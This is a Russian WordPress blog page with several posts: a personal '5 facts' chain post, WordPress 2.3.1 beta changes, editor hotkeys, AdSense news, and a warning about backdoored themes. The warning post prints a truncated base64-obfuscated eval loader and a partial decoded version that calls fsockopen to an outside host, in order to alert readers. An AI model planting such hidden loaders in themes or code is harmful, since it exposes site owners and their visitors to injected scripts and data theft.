Блог о WordPress от Тараса

Дошла и до меня это порочная запись, через “инфицированных” Артёма и Максима, теперь вот поминаю добрым словом Презренного и пишу о себе.

1. А я и не Тарас вовсе.
Ага, по паспорту я Тарашевский Андрей Игоревич. “Прозвище” Тарас появилось ещё в школе, классе в 6, тогда оно было более длинным - Тарас Бульба, которым меня дразнили девчонки, чем доводили до бешенства. Понятное дело, что данная модификация повелась от нестандартной фамилии - Тарашевский, но понемногу я привык и уже совершенно адекватно реагировал на обращение - Тарас.
Вообще с моей фамилией довольно много приколов связано, например, почти каждый новый преподаватель старается, не специально, извратить её прочтение, то сделают меня Парашевским, то Таршевским, то Тормашевским, но меня это даже веселит.
Или вот с военкоматом было забавно - на меня там завели аж 3 разных дела, под разными фамилиями. Выяснил я это когда мне пришло сразу 2 повестки, третье дело уже случайно нашлось в архиве, когда пришёл выяснять, в чём там дело.
В общем можете обращаться ко мне как вам удобнее - Тарас или Андрей, оба варианты имеют место быть.

2. Я ненавижу флэшмобы, письма щастья и прочее масс-действо.
Просто одно время меня это дико начало выбешивать, когда из контакт листа аськи за день присылали до 30 сообщений “разошли или будь проклят”, так же всегда отрицательно относился к заполнению анкет и “ответь на вопросы и размести у себя в дневнике”. Обычно в icq я кидаю ссылку на одно из “анти-писем-щастья”, сделанных моими друзьями (намбер ван и намбер ту), а так же напоминаю о такой чудо вещи, как Ignore List в аське.
Собственно говоря, пишу сейчас эти “5 фактов”, только из уважения к людям, сославшимся на меня.

3. Существует два основных жизненных принципа для меня и огромная лень.
Первый из них - “Никогда и ни на что не обижаться”. Это я для себя решил ещё в школьные времена. Просто подумал, что несколько глупо тратить время на обиды, “дуться” на кого-то, нервы расшатывать, если просто можно быть выше этого и, сведя всё к анализу проблемы, сделать соответствующие выводы. Теперь, если мне человек, грубо говоря, “насрал”, то я в голове ставлю “галочку” и не парюсь. В следующий раз мало что от меня данный индивид добьётся, если вдруг потребуется помощь или совет.
Второй - “Всё, что не устраивает - посылается на хуй”. Да, именно вот в таком изложении. Хоть я и стараюсь не материться, как в блоге, так и в реальной жизни, но без этого крепкого словца всё предложение теряет смысл. Думаю, тут особых пояснений не требуется - если меня начинает что-то излишне напрягать, то я просто перестаю этим заниматься, то же самое относится к людям, мне проще перестать общаться с человеком, чем втолковывать по сто раз кому-то, в чём он не прав.
Ну а лень - это вообще отдельная песня - я могу составить офигенно грандиозный план, потратить на это время, а потом, вместо того, чтобы быстренько сесть и сделать, буду сёрфить сеть или играть в какую-нибудь сетевую игру. Зашёл тут в свой аккаунт World of Warcraft и округлил глаза, от того, что у меня игрового времени (т.е. сколько суммарно я провёл онлайн в игре) получилось 57+ дней. Это же 2 месяца 24/7, сколько всего я бы мог сделать за это время, но, увы и ах…

4. Я не курю сигареты.
Несмотря на то, что 99% людей, с которыми я общаюсь, курят постоянно, меня подобное время препровождение совершенно не привлекает. Я вообще скептически отношусь к любого рода зависимостям, когда что-то становится сильнее человека и его воли. Сам не раз наблюдал “сильных людей, бросающих с завтрашнего дня”, которые по прошествии недели находили себе отговорку, в виде стресса или ещё чего-нибудь, и благостно возвращались в лоно курильщиков.
Мне отвратителен как запах, так и вкус сигаретного дыма, а вот к кальянам я отношусь совершенно положительно и, бывает, покуриваю его дома.

5. Как же Я выгляжу?
Один раз увидеть лучше, чем сто раз услышать, не так ли? Ну, вот можете полюбоваться на меня в разные годы моей не долгой жизни. Смею заметить, я люблю экспериментировать над собой.
*картинки кликабельны*

Спасибо за внимание, если кому-то было вообще интересно. Эстафету передавать не буду, ибо см. п. 2 данного текста.

Вдогонку к предыдущему посту о темах, взгляд с другой стороны, а если быть точным, то пост для тех самых пользователей, которые все эти темы качают.

Вообще, в последнее время очень сильно повысилось количество постов о взломе разных блогов на WordPress’е, а всё потому, что люди забывают обновляться до последней версии. Но даже наличие последней стабильной версии с офф.сайта не даёт гарантий, что вас не “поимеют”.

Недавно на глаза попался пост о интересном способе, который применяют хакеры для получения информации о сайте.

Для тех, кто не очень дружит с ангельским языком, расскажу вкратце о чём там речь:
Некий дизайнер Derek Punsalan сделал темку (а точнее даже несколько) для WordPress и решил их подарить всему миру. В итоге она разлетелась по куче разных тематических архивов, одним из которых был WpSphere. И что вы думаете?

После скачивания и установки с этого сайта, некоторые пользователи заметили, что в тексте страниц находится примерно такой код

@eval(@base64_decode(’aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\...

Если вы не разбирается в PHP, поясню - такой метод применяется, чтобы скрыть реальный исполняемый код, потому что после декодирования (функция, base64_decode), текст будет выглядеть несколько более подозрительно

if($R37C014DAE5FE4FE5C77B6735ABC30916 =
@fsockopen("www.wpssr.com", 80,
$R32D00070D4FFBCCE2FC669BBA812D4C2,
$R5F525F5B398DADD7CF0784BD406298E3, 3))
$R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr";...

В результате выполнения этого скрипта, с одного из серверов (я указал лишь часть исходника) подгружался java-script. По словам одного из блоггеров, Пола Кэрола, который проводил исследования по поводу “вредоносности” данного кода, выходит, что ничего плохого не происходило, а Wp-Sphere просто мониторили количество установок тем.

Только вот, несмотря на это, что-то уж через чур большая дыра в безопасности получается, ведь внедряя ява-скрипт на страницу, злоумышленники могут без проблем крутить рекламу, а что более скверно - получить информацию, сохраненную в браузере.

Весь этот пост написан для того, чтобы вы задумались перед установкой очередной темы, скаченой из не проверенных источников. Или, во всяком случае, проверили, что там у неё внутри, а если не можете сами (по причине, что любой код для вас - набор бессмысленных знаков), то попросите того, кто понимает, можно и меня.

И напоследок, к проверенным источникам с лёгкостью могу отнести сайт themes.wordpress.net, ибо официальный, а так же советую ознакомиться с “Кратким руководством по безопасности WordPress” от Максима, скоро постараюсь опубликовать не краткое, а большое и разностороннее.

Мира вам и безопасного интернета и WordPress.

Не заметил особого ажиотажа, да и вообще новостей на эту тему, но как писали на Проблоггере со ссылкой на официальный блог адсенса: “AdSense Introduce ServerSide Ad Management”, что на русский можно перевести как “Adsence представляет управление рекламой на стороне сервера”.

Поясню что я понял исходя из текста поста, пока что гугл проводит закрытое тестирование новой фишки для адсенса, которая позволит менять внешний вид и цветовую гамму, а так же тип, рекламных блоков прямо из панели управления аккаунтом. Это довольно хорошо видно на картинке.

Теперь, установив однажды код адсенса на сайт или внедрив его в тему, не придётся в ручную менять кучу страниц на разных сайтах, чтобы ссылки поменяли цвет на красный - вся визуальная часть будет настраиваться в одном месте - в аккаунте.

К сожалению, чтобы воспользоваться этой фичей придётся подождать какое-то время, пока не закончится период активного тестирования, а потом, как это не прискорбно, необходим будет менять код на всех своих сайтах на новый, но этот раз должен стать последним, как обещает гугл.

Подождём увидим, а ждать, по-моему, стоит.

На офф.сайте WordPress выложили публичную бету последней ветки - WordPress 2.3.1 beta.
Нововведений мало, обновление больше связано с багфиксами, поэтому быстро перечислю что добавили/исправили.

Нововведения:
1. Добавлена поддержка тэгов (меток) для Windows Live Writer (WLW). (интересно есть кто-то, кто через него пишет?)
2. Убрали кнопку “Преобразовать все категории”, потому что кто-то (а таких видимо не мало) накололся, импортировав всё в тэги.
3. Заменили часть запросов с LEFT JOIN на INNER JOIN, что должно увеличить скорость и уменьшить нагрузку на сервер.
4. Оптимизировали запросы, работающие с термами в таксономии, что так же должно положительно сказаться на скорости работы.

Теперь список багфиксов:
Перечислю сами проблемы, так что если найдёте свою, то можете смело обновляться (предварительно сохранив копию старых файлов)
1. Prototype загружался раньше jQuery, что вызывало какую-то noConflict system проблему.
2. wp_safe_redirect() чувствителен к регистру передаваемого URL.
3. clean_url() заменял амперсанд (&) на &#038;, что вызывало ошибку при передачи строки в качестве запроса к БД.
4. Фильтр get_pages применялся дважды при включенном кэше, что вызывало дублирование контента.
5. Оповещение по email не работало на хостингах, проверяющих адрес отправителя письма (должен принадлежать текущему домену).
(кстати, чтобы это пофиксить нужно добавить в файле pluggable.php строку

$phpmailer->Sender = "wordpress@" . preg_replace('#^www\.#', '',
strtolower($_SERVER['SERVER_NAME']));

перед

$phpmailer->FromName = "WordPress";

)
6. Проблемы с входом в WP после отключения “тестовых cookie”.
7. Проблема с закладкой “Все” в панели “Загрузка” (Browse all и Upload соответственно в англ.версии), при апгрейде с более старых версий.
8. У виджета “Рубрика” был не верно указан class (widget_catgories) из-за чего стили применялись неверно.
9. При отправке файла в редактор (из списка загруженых на сервер) при пустом заголовке файла, выдавалась ошибка.
10. Ошибка в MT-импортере.
11. Не верное преобразование скобок (< >) в не-визуальном редакторе, в определенных ситуациях.
12. Проблема с UTW-импортом.
13. При импорте ссылок из Blogroll, категории ссылок импортировались не верно.
14. Проверка обновлений плагинов в определенные моменты работала не верно.
15. Некоторые плагины статистики (WP-stats/slimstats) работали не правильно, обрабатывая клики только по одной странице.
16. Иногда предпросмотр поста вызывал бесконечный редирект.
17. Появлялась ошибка “WordPress database error: [Duplicate entry '106-14' for key 1]” после обновления до 2.3.

---

Вчера ездил на семинар “Тематические блоги: от идеи до реализации”, честно говоря, ничего нового для себя не почерпнул. Почти что “перевод времени на дерьмо”, хотя оба докладчика были интересны сами по себе, а вот тема чересчур изъезжена.
За то пообщался с Олесей Бреус на разные темы, в том числе и о возможности использовать WordPress как средство для быстрой разработки сайтов-визиток, а так же как основы вообще для любых сайтов.
Возник вопрос - как обучить человека далёкого от компьютеров вносить изменения и создавать посты? Может кто-то знает хорошие (или не очень) видео-уроки?

Тов. Евгений с Design For Masters (который я постоянно читаю) в комментариях к “Упрощаем себе жизнь в админке” посетовал на то, что в WordPress’овском (не визуальном) редакторе нет хоткеев. А как оказалось есть, и аж целых 13 штук!

1. Bold: Alt+SHIFT+b
2. Italics: Alt+SHIFT+i
3. Link: Alt+SHIFT+a
4. Blockquote: Alt+SHIFT+q
5. del: Alt+SHIFT+d
6. ins: Alt+SHIFT+m
7. Image: Alt+SHIFT+i
8. Unordered List (ul): Alt+SHIFT+u
9. Ordered List (ol): Alt+SHIFT+o
10. List Item (li): Alt+SHIFT+l
11. Code: Alt+SHIFT+c
12. More: Alt+SHIFT+t
13. Опубликовать пост: Alt+SHIFT+p

Как не трудно догадаться всё это реализовывается не какими-то спец.средствами WordPress, а банальным параметром у кнопок - accesskey, поэтому при небольших затратах времени можно прицепить хоткей вида Alt+SHIFT+буква к любой кнопке в админке и/или пользовательском меню, добавив в

атрибут accesskey=”буква”.
В связи с этим желание улучшить функционал WP-AddQuickTag стало практически непреодолимо.

Пока искал плагины для вордпресса для реализации хоткеев, наткнулся на аддон для FireFox, под названием ZWordPress. По ссылке можно прочитать про установку и настройку, а так же скачать (zwordpress.xpi - 14 Кб).
Расскажу вкратце что он может, а вы уж сами решайте пользовать или нет: после установки вешает свою меню на панель, рядом со “Справкой”, из которого можно открывать соответствующее меню своего блога откуда угодно, причём главная особенность - поддержка до 10 блогов с переключением между ними комбинацией Alt+Z+номер_настроенного_блога.

Доступ к пунктам меню всё через тот же хоткей или из панели:

Текущий активный блог показывается в нижней панели FireFox:

И всё бы хорошо, да у меня на комбинации Alt+Z уже долгие годы стоит хоткей в WinAmp, поэтому думаю плагин не приживется, но может у кого-то он найдёт применение.

---

Хоть и обещал вывесить новые смайлы, но пока что занят редизайном темы под один новый проект, но между тем стараюсь не забрасывать старые плагины и наработки. Сейчас тестирую вывод кол-ва загрузок для DownloadCounter Mod Rus в произвольном месте поста.
Попутно обновил плагины - убил Tiger Admin и поставил вместо него Advanced-Admin-Menus (Евгений, ты о нём говорил?), а так же взял у ЛеКактуса переведенный Simple Tags, быстренько проставил метки на старые записи и наконец-то обзавелся WP-23-RelatedPosts.
Работает он только с 2.3 версией и выбирает посты исходя из тэгов.
И всё же интересно, а может есть какой-то плагин хоткеев для ВордПресс?